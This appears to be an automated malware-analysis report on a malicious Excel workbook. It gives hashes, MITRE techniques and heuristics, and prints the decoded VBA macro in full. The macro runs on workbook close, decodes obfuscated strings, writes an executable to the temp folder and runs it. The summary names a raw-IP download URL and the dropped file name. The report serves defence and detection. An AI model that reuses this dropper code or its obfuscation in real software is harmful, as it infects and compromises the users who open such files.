Office (OLE) malware analysis — malicious · 532aeaaf452fbafe

MALICIOUS

Office (OLE)

31.5 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-04-15

MD5: 68264dfa2f0b2126a9a8cdb6df52649f SHA-1: 1024017758284f1284894ac0b7255f5734636eb8 SHA-256: 532aeaaf452fbafee06bf45f0be61020d279e71a59cffc4b56486b9ddb71e8d3

100 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The VBA macro contains obfuscated calls to CreateObject for Microsoft.XMLHTTP and ADODB.Stream, indicating it is designed to download a file. The script reconstructs the URL "http://62.75.42.21/czxa/ddls.gif" and saves the downloaded content to a temporary executable file named "dfsdfdf.exe" in the user's temporary directory. It then attempts to execute this downloaded file.

Heuristics 3

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set WshShell = CreateObject(AOrMv(" {Џў— ") + AOrMv("¤8{–‘љљ"))
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3536 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3536 bytes
SHA-256: `cfc233b040d06ece3acc6abf21444fe64e1db5ae30fe5a391188176eae113259`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ЭтаКнига" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_BeforeClose(Cancel As Boolean) xSJcum3HK8GM End Sub Attribute VB_Name = "Лист1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Attribute VB_Name = "Лист2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Attribute VB_Name = "Лист3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Attribute VB_Name = "Module1" Sub xSJcum3HK8GM() Dim PathToSave Dim UVe As Boolean Dim smF As Boolean PathToSave = AOrMv("-\|sx-†ќќpn““““Џ“�Џ8¦ЋЈ") Dim WshShell Dim TKBOYHHu As Integer Dim kffejUNUZL As Double Set WshShell = CreateObject(AOrMv(" {Џў— ") + AOrMv("¤8{–‘љљ")) PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave) Set s = CreateObject(AOrMv("ehu") + AOrMv("hf8{¤ў‘Ќ›")) s.Mode = 3 s.Type = 2 s.Open s.WriteText Worksheets(AOrMv("Ґ“}ѓj}ѓ“")).Range(AOrMv("h><")).Value Call s.SaveToFile(PathToSave, 2) WshShell.Run PathToSave Dim QFCy As Currency Dim Idfot As Double End Sub Public Function AOrMv(Eja5j As String) As String Dim GJdGKYiER As Byte Dim poteXeJW As Date Dim I As Integer Dim OIPsG As Byte Dim CRmnvHCfuO As Single Dim eIKqLQ As Double Dim EdEPJbYyRp As Single Dim gOcisfR220 As Integer, E1RkDubPSgOU As String Dim ReEEfnAcyb As Boolean Dim QuHHWadVtJ As Boolean gOcisfR220 = Len(Eja5j) For I = 1 To gOcisfR220 Dim bHDDB As Byte Dim DOUQbsIPQ As Double E1RkDubPSgOU = E1RkDubPSgOU & Chr(HtQrUf(Asc(Mid(Eja5j, I, 1)))) Next I Dim TyPuSkKk As String Dim nNcVFmpKm As Long Dim pRZmOhN As Single Dim FUtWCAh As Double AOrMv = E1RkDubPSgOU Dim oAGCNefBCM As Single Dim snomrdWdHi As Date Dim TjGIRojNPy As Boolean Dim HOVlMLb As Date End Function Private Function HtQrUf(NidrM As String) As Integer Dim XbBo As Single Dim THcSJXhQ As Date Dim I As Integer Dim gOcisfR220 As String, E1RkDubPSgOU As Integer, TUTEE As Integer Dim mNYS As Single Dim qsNpuJTnBo As Double gOcisfR220 = Len(NidrM) For I = 0 To gOcisfR220 Dim LMKP As Single Dim DYMVs As Long TUTEE = Val(Mid(StrReverse(NidrM), I + 1, 1)) E1RkDubPSgOU = E1RkDubPSgOU + ((8 ^ I) * TUTEE) Next I HtQrUf = E1RkDubPSgOU End Function Attribute VB_Name = "Module2" Option Explicit Attribute VB_Name = "Module3" Option Explicit

SHA-256: cfc233b040d06ece3acc6abf21444fe64e1db5ae30fe5a391188176eae113259

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_BeforeClose(Cancel As Boolean)
xSJcum3HK8GM
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Module1"

Sub xSJcum3HK8GM()
Dim PathToSave

Dim UVe As Boolean



Dim smF As Boolean


PathToSave = AOrMv("-|sx-†ќќpn““““Џ“�Џ8¦ЋЈ")
Dim WshShell

Dim TKBOYHHu As Integer



Dim kffejUNUZL As Double


Set WshShell = CreateObject(AOrMv(" {Џў— ") + AOrMv("¤8{–‘љљ"))
PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
Set s = CreateObject(AOrMv("ehu") + AOrMv("hf8{¤ў‘Ќ›"))
s.Mode = 3
s.Type = 2
s.Open
s.WriteText Worksheets(AOrMv("Ґ“}ѓj}ѓ“")).Range(AOrMv("h><")).Value
Call s.SaveToFile(PathToSave, 2)
WshShell.Run PathToSave

Dim QFCy As Currency



Dim Idfot As Double


End Sub
Public Function AOrMv(Eja5j As String) As String

Dim GJdGKYiER As Byte



Dim poteXeJW As Date


    Dim I As Integer

Dim OIPsG As Byte



Dim CRmnvHCfuO As Single



Dim eIKqLQ As Double



Dim EdEPJbYyRp As Single


    Dim gOcisfR220 As Integer, E1RkDubPSgOU As String

Dim ReEEfnAcyb As Boolean



Dim QuHHWadVtJ As Boolean


    gOcisfR220 = Len(Eja5j)
    For I = 1 To gOcisfR220

Dim bHDDB As Byte



Dim DOUQbsIPQ As Double


        E1RkDubPSgOU = E1RkDubPSgOU & Chr(HtQrUf(Asc(Mid(Eja5j, I, 1))))
    Next I

Dim TyPuSkKk As String



Dim nNcVFmpKm As Long



Dim pRZmOhN As Single



Dim FUtWCAh As Double


    AOrMv = E1RkDubPSgOU

Dim oAGCNefBCM As Single



Dim snomrdWdHi As Date



Dim TjGIRojNPy As Boolean



Dim HOVlMLb As Date


End Function
Private Function HtQrUf(NidrM As String) As Integer

Dim XbBo As Single



Dim THcSJXhQ As Date


    Dim I As Integer
    Dim gOcisfR220 As String, E1RkDubPSgOU As Integer, TUTEE As Integer

Dim mNYS As Single



Dim qsNpuJTnBo As Double


    gOcisfR220 = Len(NidrM)
    For I = 0 To gOcisfR220

Dim LMKP As Single



Dim DYMVs As Long


        TUTEE = Val(Mid(StrReverse(NidrM), I + 1, 1))
        E1RkDubPSgOU = E1RkDubPSgOU + ((8 ^ I) * TUTEE)
    Next I
    HtQrUf = E1RkDubPSgOU
End Function


Attribute VB_Name = "Module2"
Option Explicit


Attribute VB_Name = "Module3"
Option Explicit

Open this report in the interactive analyzer, or submit your own file for analysis.